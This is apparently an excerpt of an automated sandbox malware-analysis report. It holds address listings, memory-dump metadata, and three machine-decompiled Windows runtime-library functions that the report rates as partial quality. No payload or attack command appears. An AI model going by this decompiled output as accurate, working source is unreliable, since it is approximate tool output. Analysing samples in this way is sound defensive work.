                                                            0x1eccbe35
                                                            0x1eccbe39
                                                            0x1eccbe46
                                                            0x1eccbe4f
                                                            0x1eccbe54
                                                            0x1eccbe56
                                                            0x1eccbef8
                                                            0x1eccbef8
                                                            0x00000000
                                                            0x1eccbe5c
                                                            0x1eccbe5c
                                                            0x1eccbe60
                                                            0x00000000
                                                            0x1eccbe66
                                                            0x1eccbe66
                                                            0x1eccbe7f
                                                            0x1eccbe84
                                                            0x1eccbe87
                                                            0x1eccbe89
                                                            0x1eccbe8b
                                                            0x1eccbe99
                                                            0x1eccbe9d
                                                            0x1eccbea0
                                                            0x1eccbeac
                                                            0x1eccbeaf
                                                            0x1eccbeb1
                                                            0x1eccbeb3
                                                            0x1eccbeb3
                                                            0x00000000
                                                            0x1eccbea2
                                                            0x1eccbea2
                                                            0x00000000
                                                            0x1eccbea2
                                                            0x1eccbe8d
                                                            0x1eccbe8d
                                                            0x1eccbe92
                                                            0x00000000
                                                            0x1eccbe92
                                                            0x1eccbe8b
                                                            0x1eccbe60
                                                            0x1eccbe3b
                                                            0x1eccbe3b
                                                            0x1eccbe3e
                                                            0x00000000
                                                            0x1eccbe40
                                                            0x1eccbe40
                                                            0x1eccbe44
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1eccbe44
                                                            0x1eccbe3e
                                                            0x1eccbe29
                                                            0x1eccbe29
                                                            0x00000000
                                                            0x1eccbe29
                                                            0x1eccbe27
                                                            0x00000000
                                                            0x1ec8fba7
                                                            0x1ec8fba7
                                                            0x1ec8fbab
                                                            0x1eccbf02
                                                            0x1ec8fbb1
                                                            0x1ec8fbb1
                                                            0x1ec8fbb8
                                                            0x1ec8fbbd
                                                            0x1ec8fbbd
                                                            0x1ec8fbbf
                                                            0x1ec8fbbf
                                                            0x1ec8fbc5
                                                            0x1ec8fbcb
                                                            0x1ec8fbf8
                                                            0x1ec8fbf8
                                                            0x1ec8fbfa
                                                            0x00000000
                                                            0x1ec8fc00
                                                            0x1ec8fc00
                                                            0x1ec8fc03
                                                            0x00000000
                                                            0x1ec8fc09
                                                            0x1ec8fc09
                                                            0x1ec8fc0f
                                                            0x1ec8fc15
                                                            0x1ec8fc23
                                                            0x1ec8fc23
                                                            0x1ec8fc25
                                                            0x1ec8fc27
                                                            0x1ec8fc75
                                                            0x1ec8fc7c
                                                            0x1ec8fc84
                                                            0x00000000
                                                            0x1ec8fc29
                                                            0x1ec8fc29
                                                            0x1ec8fc2d
                                                            0x1ec8fc30
                                                            0x1eccbf0f
                                                            0x00000000
                                                            0x1ec8fc36
                                                            0x1ec8fc38
                                                            0x1ec8fc3b
                                                            0x1ec8fc41
                                                            0x1eccbf17
                                                            0x1eccbf19
                                                            0x1eccbf48
                                                            0x1eccbf4b
                                                            0x00000000
                                                            0x1eccbf1b
                                                            0x1eccbf22
                                                            0x1eccbf24
                                                            0x1eccbf26
                                                            0x00000000
                                                            0x1eccbf2c
                                                            0x1eccbf37
                                                            0x1eccbf39
                                                            0x1eccbf3b
                                                            0x00000000
                                                            0x1eccbf41
                                                            0x1eccbf41
                                                            0x1eccbf41
                                                            0x1eccbf41
                                                            0x1eccbf45
                                                            0x00000000
                                                            0x1eccbf45
                                                            0x1eccbf3b
                                                            0x1eccbf26
                                                            0x00000000
                                                            0x1ec8fc47
                                                            0x1ec8fc47
                                                            0x1ec8fc49
                                                            0x1ec8fcb2
                                                            0x1ec8fcb4
                                                            0x1ec8fcb6
                                                            0x1ec8fcdc
                                                            0x1ec8fcdc
                                                            0x00000000
                                                            0x1ec8fcb8
                                                            0x1ec8fcc3
                                                            0x1ec8fcc5
                                                            0x1ec8fcc7
                                                            0x00000000
                                                            0x1ec8fcc9
                                                            0x1ec8fcc9
                                                            0x1ec8fccd
                                                            0x00000000
                                                            0x1ec8fccd
                                                            0x1ec8fcc7
                                                            0x00000000
                                                            0x1ec8fc4b
                                                            0x1ec8fc4b
                                                            0x1ec8fc4e
                                                            0x1ec8fc4e
                                                            0x1ec8fc51
                                                            0x1ec8fc51
                                                            0x1ec8fc54
                                                            0x1ec8fc5a
                                                            0x1ec8fc5c
                                                            0x1ec8fc5f
                                                            0x1ec8fc61
                                                            0x1ec8fc63
                                                            0x1ec8fc65
                                                            0x1ec8fc67
                                                            0x1ec8fc6e
                                                            0x1ec8fc72
                                                            0x1ec8fc72
                                                            0x1ec8fc72
                                                            0x1ec8fc72
                                                            0x1ec8fc67
                                                            0x1ec8fc61
                                                            0x00000000
                                                            0x1ec8fc5a
                                                            0x1ec8fc49
                                                            0x1ec8fc41
                                                            0x1ec8fc30
                                                            0x1ec8fc27
                                                            0x1ec8fc03
                                                            0x1ec8fbcd
                                                            0x1ec8fbd3
                                                            0x1ec8fbd9
                                                            0x1ec8fbdc
                                                            0x1ec8fbde
                                                            0x1ec8fc99
                                                            0x1ec8fc9b
                                                            0x1ec8fc9d
                                                            0x1ec8fcd5
                                                            0x1ec8fcd5
                                                            0x1ec8fc89
                                                            0x1ec8fc89
                                                            0x00000000
                                                            0x1ec8fc9f
                                                            0x1ec8fc9f
                                                            0x1ec8fca3
                                                            0x00000000
                                                            0x1ec8fca3
                                                            0x00000000
                                                            0x1ec8fbe4
                                                            0x1ec8fbe4
                                                            0x1ec8fbe4
                                                            0x1ec8fbe4
                                                            0x1ec8fbe9
                                                            0x1ec8fbf2
                                                            0x00000000
                                                            0x1ec8fbf2
                                                            0x1ec8fbde
                                                            0x1ec8fbcb
                                                            0x1ec8fbab
                                                            0x1ec8fc8b
                                                            0x1ec8fc8b
                                                            0x1ec8fc8c
                                                            0x1ec8fb80
                                                            0x1ec8fb72
                                                            0x1ec8fb5e
                                                            0x1ec8fc8d
                                                            0x1ec8fc91
                                                            0x1ec8fadf
                                                            0x1ec8fadf
                                                            0x1ec8fae1
                                                            0x1ec8fae4
                                                            0x1ec8fae7
                                                            0x1ec8faec
                                                            0x1ec8faf8
                                                            0x1ec8fb00
                                                            0x1ec8fb07
                                                            0x1ec8fb0f
                                                            0x1ec8fb0f
                                                            0x1ec8fb07
                                                            0x00000000
                                                            0x1ec8faf8
                                                            0x1ec8fadd

                                                            Strings
                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 1ECCBE0F
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                            • API String ID: 0-865735534
                                                            • Opcode ID: 84e9870ea9ac4b1ca489438499916679ecca24905c287c6adce981c383d1a4ec
                                                            • Instruction ID: b9bb151cd8c4e9a537f816e616c4ba8a6c886d1dfb15086dcf654fabc65d6654
                                                            • Opcode Fuzzy Hash: 84e9870ea9ac4b1ca489438499916679ecca24905c287c6adce981c383d1a4ec
                                                            • Instruction Fuzzy Hash: D1A10A76B1069BCBD721CFA5CD50BAA73A5AF48718F004B6DDA46CB784DB30D981CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC52D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E1EC52D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1ed45350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1ed47bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E1EC997C0();
				}
				if( *0x1ed479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1ed479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E1EC81624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E1EC77D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E1ECEFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E1EC99520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E1EC8E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L1ECADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1ed46901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1ed46901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E1EC99980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E1EC995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E1EC77D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E1EC77D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E1ECD7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E1ECEFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1ed45350;
							if(_t109 != 0x1ed45350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E1ECEFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E1ECE5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                            0x1ec52d8a
                                                            0x1ec52d8a
                                                            0x1ec52d92
                                                            0x1ec52d96
                                                            0x1ec52d9e
                                                            0x1ec52da0
                                                            0x1ec52da3
                                                            0x1ec52da5
                                                            0x1ec52da8
                                                            0x1ec52dab
                                                            0x1ec52db2
                                                            0x1ecaf9aa
                                                            0x1ecaf9ab
                                                            0x1ecaf9ae
                                                            0x1ecaf9ae
                                                            0x1ec52db8
                                                            0x1ec52dc2
                                                            0x1ecaf9b9
                                                            0x1ecaf9be
                                                            0x1ecaf9bf
                                                            0x1ecaf9bf
                                                            0x1ec52dcf
                                                            0x1ecaf9c9
                                                            0x1ec52dd5
                                                            0x1ec52dd5
                                                            0x1ec52dd5
                                                            0x1ec52dde
                                                            0x1ec52de1
                                                            0x1ec52e70
                                                            0x1ec52e72
                                                            0x1ec52e72
                                                            0x1ec52de7
                                                            0x1ec52deb
                                                            0x1ec52e7c
                                                            0x1ec52e83
                                                            0x1ec52e85
                                                            0x1ec52e8b
                                                            0x1ec52e8d
                                                            0x1ec52e92
                                                            0x1ec52e92
                                                            0x1ec52e85
                                                            0x1ec52df1
                                                            0x1ec52df7
                                                            0x1ec52df9
                                                            0x1ec52df9
                                                            0x1ec52dfc
                                                            0x1ec52dff
                                                            0x1ec52e02
                                                            0x00000000
                                                            0x1ec52e05
                                                            0x1ec52e0c
                                                            0x1ecaf9d9
                                                            0x1ec52e12
                                                            0x1ec52e12
                                                            0x1ec52e12
                                                            0x1ec52e1a
                                                            0x1ecaf9e3
                                                            0x1ecaf9e9
                                                            0x1ecaf9f0
                                                            0x1ecaf9f6
                                                            0x1ecaf9f8
                                                            0x1ecaf9f8
                                                            0x1ecaf9f0
                                                            0x1ec52e23
                                                            0x1ecafa02
                                                            0x1ecafa03
                                                            0x1ecafa05
                                                            0x1ecafa06
                                                            0x00000000
                                                            0x1ec52e29
                                                            0x1ec52e29
                                                            0x1ec52e2e
                                                            0x1ec52e34
                                                            0x1ec52e3e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec52e44
                                                            0x1ec52e47
                                                            0x1ec52e4d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec52e4f
                                                            0x1ec52e54
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec52e5a
                                                            0x1ec52e5f
                                                            0x1ec52e9a
                                                            0x1ec52ea4
                                                            0x1ec52ea5
                                                            0x1ec52ea8
                                                            0x1ec52eaf
                                                            0x1ec52eb2
                                                            0x1ec52eb5
                                                            0x1ecafae9
                                                            0x1ecafaeb
                                                            0x1ecafaed
                                                            0x1ecafaef
                                                            0x1ecafaf7
                                                            0x1ecafaf8
                                                            0x1ecafafd
                                                            0x1ecafaff
                                                            0x1ecafb04
                                                            0x1ecafb04
                                                            0x1ecafaff
                                                            0x1ec52ec0
                                                            0x1ec52ec4
                                                            0x1ec52ec6
                                                            0x1ec52ec8
                                                            0x1ecafb14
                                                            0x1ecafb18
                                                            0x1ecafb1e
                                                            0x1ecafb21
                                                            0x1ecafb21
                                                            0x1ec52ece
                                                            0x1ec52ece
                                                            0x1ec52ece
                                                            0x1ec52ed7
                                                            0x1ec52e61
                                                            0x1ec52e63
                                                            0x1ecafa6b
                                                            0x1ecafa71
                                                            0x1ecafa76
                                                            0x1ecafa78
                                                            0x1ecafa8a
                                                            0x1ecafa7a
                                                            0x1ecafa83
                                                            0x1ecafa83
                                                            0x1ecafa8f
                                                            0x1ecafa91
                                                            0x1ecafa97
                                                            0x1ecafa9d
                                                            0x1ecafaa4
                                                            0x1ecafaaa
                                                            0x1ecafaaf
                                                            0x1ecafab1
                                                            0x1ecafac3
                                                            0x1ecafab3
                                                            0x1ecafabc
                                                            0x1ecafabc
                                                            0x1ecafac8
                                                            0x1ecafacb
                                                            0x1ecafadf
                                                            0x1ecafadf
                                                            0x1ecafacb
                                                            0x1ecafaa4
                                                            0x1ecafa91
                                                            0x1ec52e6f
                                                            0x1ec52e6f
                                                            0x1ec52e5f
                                                            0x1ecafa13
                                                            0x1ecafa15
                                                            0x1ecafa17
                                                            0x1ecafa1f
                                                            0x1ecafa21
                                                            0x1ecafa22
                                                            0x1ecafa25
                                                            0x1ecafa28
                                                            0x1ecafa2f
                                                            0x1ecafa2f
                                                            0x1ecafa2a
                                                            0x1ecafa2a
                                                            0x1ecafa2a
                                                            0x1ecafa31
                                                            0x1ecafa34
                                                            0x1ecafa36
                                                            0x1ecafa3c
                                                            0x1ecafa3e
                                                            0x1ecafa41
                                                            0x1ecafa43
                                                            0x1ecafa45
                                                            0x1ecafa45
                                                            0x1ecafa41
                                                            0x1ecafa3c
                                                            0x1ecafa4a
                                                            0x1ecafa4f
                                                            0x1ecafa51
                                                            0x1ecafa53
                                                            0x1ecafa56
                                                            0x1ecafa5b
                                                            0x1ecafa5e
                                                            0x00000000
                                                            0x1ecafa5e
                                                            0x1ec52e23

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Re-Waiting
                                                            • API String ID: 0-316354757
                                                            • Opcode ID: b7e42372e8c1daa32eba293042781a690774a4fe7166ef9c36c826a92cd39206
                                                            • Instruction ID: 2713bfd9bcd8e36a0aee75f236712132009335a495b0c4ed7ff3ed617f736036
                                                            • Opcode Fuzzy Hash: b7e42372e8c1daa32eba293042781a690774a4fe7166ef9c36c826a92cd39206
                                                            • Instruction Fuzzy Hash: 68610F32B006869BD721CF69CC90BAE77F6AF84B10F240769E951973C4EB74AD81C785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED20EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E1ED20EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E1ED1FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E1ED21074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E1EC99730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E1ED1A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E1ED1A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1ed48b04 >> 0x14) + (_v44 -  *0x1ed48b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E1EC77D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1ED1138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E1EC77D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E1ED0FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1ed48724 & 0x00000008) != 0) {
						E1ED152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E1ED215B5(0x1ed48ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                            0x1ed20eb7
                                                            0x1ed20eb9
                                                            0x1ed20ec0
                                                            0x1ed20ec2
                                                            0x1ed20ecd
                                                            0x1ed2105b
                                                            0x1ed2105b
                                                            0x1ed21061
                                                            0x1ed21066
                                                            0x1ed21066
                                                            0x1ed2106b
                                                            0x1ed21073
                                                            0x1ed21073
                                                            0x1ed20ed3
                                                            0x1ed20ed6
                                                            0x1ed20edc
                                                            0x1ed20ee0
                                                            0x1ed20ee7
                                                            0x1ed20ef0
                                                            0x1ed20ef5
                                                            0x1ed20efa
                                                            0x1ed20efc
                                                            0x1ed20efd
                                                            0x1ed20f03
                                                            0x1ed20f04
                                                            0x1ed20f06
                                                            0x1ed20f07
                                                            0x1ed20f09
                                                            0x1ed20f0e
                                                            0x1ed20f14
                                                            0x1ed20f23
                                                            0x1ed20f2d
                                                            0x1ed20f34
                                                            0x1ed20f34
                                                            0x1ed20f14
                                                            0x1ed20f52
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed20f58
                                                            0x1ed20f73
                                                            0x1ed20f74
                                                            0x1ed20f79
                                                            0x1ed20f7d
                                                            0x1ed20f80
                                                            0x1ed20f86
                                                            0x1ed20fab
                                                            0x1ed20fb5
                                                            0x1ed20fc6
                                                            0x1ed20fd1
                                                            0x1ed20fe3
                                                            0x1ed20fd3
                                                            0x1ed20fdc
                                                            0x1ed20fdc
                                                            0x1ed20feb
                                                            0x1ed21009
                                                            0x1ed21009
                                                            0x1ed21015
                                                            0x1ed21027
                                                            0x1ed21017
                                                            0x1ed21020
                                                            0x1ed21020
                                                            0x1ed2102f
                                                            0x1ed2103c
                                                            0x1ed2103c
                                                            0x1ed21048
                                                            0x1ed21050
                                                            0x1ed21050
                                                            0x1ed21055
                                                            0x00000000
                                                            0x1ed21055
                                                            0x1ed20f88
                                                            0x1ed20f9e
                                                            0x1ed20fa2
                                                            0x1ed20fa9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed20fa9
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-2679148245
                                                            • Opcode ID: 5393981b25925e56799d4a95c15c4a21bd1cf4c856da904827945538a9aa6252
                                                            • Instruction ID: d44b2121b9a58806e5a839dabbcba4b1709040ce8e57256e8be2e0cc3607fac6
                                                            • Opcode Fuzzy Hash: 5393981b25925e56799d4a95c15c4a21bd1cf4c856da904827945538a9aa6252
                                                            • Instruction Fuzzy Hash: 725188752043829FD310CF28D991B1BB7EAAF84708F544B2CF9969B690D770E806CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E1EC8F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E1EC74120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E1EC99830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E1EC99990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E1EC995D0();
							goto L11;
						} else {
							_t109 = L1EC74620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E1EC9F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E1EC995D0();
										L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                            0x1ec8f0d3
                                                            0x1ec8f0d9
                                                            0x1ec8f0e0
                                                            0x1ec8f0e7
                                                            0x1ec8f0f2
                                                            0x1ec8f0f4
                                                            0x1ec8f0f8
                                                            0x1ec8f100
                                                            0x1ec8f108
                                                            0x1ec8f10d
                                                            0x1ec8f115
                                                            0x1ec8f116
                                                            0x1ec8f11f
                                                            0x1ec8f123
                                                            0x1ec8f124
                                                            0x1ec8f12c
                                                            0x1ec8f130
                                                            0x1ec8f134
                                                            0x1ec8f13d
                                                            0x1ec8f144
                                                            0x1ec8f14b
                                                            0x1ec8f152
                                                            0x1eccbab0
                                                            0x1eccbab0
                                                            0x1ec8f158
                                                            0x1ec8f158
                                                            0x1ec8f15a
                                                            0x1ec8f160
                                                            0x1ec8f165
                                                            0x1ec8f166
                                                            0x1ec8f16f
                                                            0x1ec8f173
                                                            0x1eccbaa7
                                                            0x1eccbaa7
                                                            0x1eccbaab
                                                            0x00000000
                                                            0x1ec8f179
                                                            0x1ec8f18d
                                                            0x1ec8f191
                                                            0x1eccbaa2
                                                            0x00000000
